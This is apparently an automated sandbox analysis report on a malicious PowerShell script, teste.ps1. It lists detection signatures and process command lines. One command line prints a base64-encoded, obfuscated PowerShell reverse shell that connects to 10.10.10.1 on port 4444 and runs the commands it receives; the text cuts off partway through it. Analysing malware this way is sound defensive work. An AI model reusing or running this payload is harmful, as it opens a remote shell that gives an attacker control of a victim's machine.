Windows
Analysis Report
teste.ps1
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Malicious encrypted Powershell command line found
AI detected malicious Powershell script
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
powershell.exe (PID: 7928 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\tes te.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 7968 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 8100 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -e JABzAHQ AcgAgAD0AI AAiAFQAYwB QACIAKwAiA EMAIgArACI AbABpACIAK wAiAGUAIgA rACIAbgB0A CIAOwAkAHI AZQB2AGUAc gBzAGUAZAA gAD0AIAAtA GoAbwBpAG4 AIAAoACQAc wB0AHIAWwA tADEALgAuA C0AKAAkAHM AdAByAC4AT ABlAG4AZwB 0AGgAKQBdA CkAOwAKACQ AUABKACAAP QAgAEAAKAA iADUANAAiA CwAIAAiADQ AMwAiACwAI AAiADUAMAA iACwAIAAiA DQAMwAiACw AIAAiADYAQ wAiACwAIAA iADYAOQAiA CwAIAAiADY ANQAiACwAI AAiADYARQA iACwAIAAiA DcANAAiACk AOwAKACQAV ABDAGgAYQB yACAAPQAgA CQAUABKACA AfAAgAEYAb wByAEUAYQB jAGgALQBPA GIAagBlAGM AdAAgAHsAI ABbAGMAaAB hAHIAXQBbA GMAbwBuAHY AZQByAHQAX QA6ADoAVAB vAEkAbgB0A DMAMgAoACQ AXwAsACAAM QA2ACkAIAB 9ADsACgAkA FAASgBDAGg AYQByACAAP QAgAC0AagB vAGkAbgAgA CQAVABDAGg AYQByADsAC gA7ACQAUgB 0AFIAagBtA E0AbABZACA APQAgAE4AZ QBXAC0AbwB CACcAJwBKA GUAQwBUACA AKAAnAFMAJ wArACcAeQA nACsAJwBzA CcAKwAnAHQ AJwArACcAZ QAnACsAJwB tACcAKwAnA C4AJwArACc ATgAnACsAJ wBlACcAKwA nAHQAJwArA CcALgAnACs AJwBTACcAK wAnAG8AYwB rAGUAdABzA C4AVABDAFA AYwBsAGkAR QBuAHQAJwA pACgAJwAxA DAALgAxADA ALgAxADAAL gAxACcALAA 0ADQANAA0A CkAOwAKACQ ARQBuAEIAd AB5AHcAdAB nAGgAIAA9A CAAJABSAHQ AUgBqAG0AT QBsAFkALgA oACcARwBlA HQAJwArACc AUwB0AHIAZ QBhAG0AJwA pACgAKQA7A FsAYgB5AHQ AZQBbAF0AX QAkAFAASgB DAGgAYQByA CAAPQAgADA ALgAuADYAN QA1ADMANQB 8ACUAewAwA H0AOwAKAHc AaABpAGwAZ QAoACgAJAB pACAAPQAgA CQARQBuAEI AdAB5AHcAd ABnAGgALgB SAGUAQQBkA CgAJABQAEo AQwBoAGEAc gAsACAAMAA sACAAJABQA EoAQwBoAGE AcgAuAEwAZ QBOAGcAVAB oACkAKQAgA C0AbgBlACA AMAApAHsAO wAKACQANgB hADAAYgA1A GUAZgBlACA APQAgACgAT gBlAFcALQB vAEIAJwAnA EoAZQBDAFQ AIAAtAFQAe QBwAEUATgB BAG0AZQAgA FMAJwB5ACc AcwAnAHQAJ wBlACcAbQA uAFQAJwBlA CcAeAAnAHQ ALgAnAEEAJ wBTACcAQwA nAEkAJwBJA EUAJwBuACc AYwAnAG8AJ wBkACcAaQA nAG4AJwBnA CkALgAoACc ARwBlACcAK wAnAHQAUwB 0AFIAaQBuA EcAJwApACg AJABQAEoAQ wBoAGEAcgA sADAALAAgA CQAaQApADs ACgAkADMAZ ABiAGYAZQA yAGUAYgBmA GYAZQAwADc AMgA3ADIAN wA5ADQAOQB kADcAYwBlA GMAYwA1ADE ANQA3ADMAY gAgAD0AIAA oAGkAZQB4A CAAIgAuACA AewAgACAAJ AA2AGEAMAB iADUAZQBmA GUAIAAgAH0 AIAAyAD4AJ gAxACIAIAB 8ACAATwB1A CcAJwB0AC0 AUwB0AHIAJ wAnAGkAbgB nACAAKQA7A AoAJABKAD0 AJABPAD0AJ ABLAD0AJAB FAD0AJABSA D0AJABQAD0 AJABXAD0AJ ABSACAAPQA gACQAewAzA GQAYgBmAGU AMgBlAGIAZ gBmAGUAMAA 3ADIANwAyA DcAOQA0ADk AZAA3AGMAZ QBjAGMANQA xADUANwAzA GIAfQAgACs AIAAnABsAW wA5ADQAbQB KAG8AawBlA HIAUwBoAGU AbABsABsAW wAzADkAbQA gACcAIAArA CAAKABwAHc AZAApAC4AU ABhAHQAaAA gACsAIAAnA D4AIAAnADs ACgAkAHMAI AA9ACAAKAA iAHsAMAB9A HsAMQB9AHs AMwB9AHsAM gB9ACIALQB mACAAIgBzA GUAJwAnAG4 AZAAiACwAI gBiAHkAIgA sACIAZQAiA CwAIgB0ACI AKQA7ACAAJ ABzACAAPQA gACgAWwB0A GUAeAB0AC4 AZQBuAGMAb wBkAGkAbgB nAF0AOgA6A EEAUwBDAGk AaQApAC4AR wBlAHQAQgB ZAFQAZQBTA CgAJABSACk AOwAKACQAR QBuAEIAdAB 5AHcAdABnA GgALgBXAHI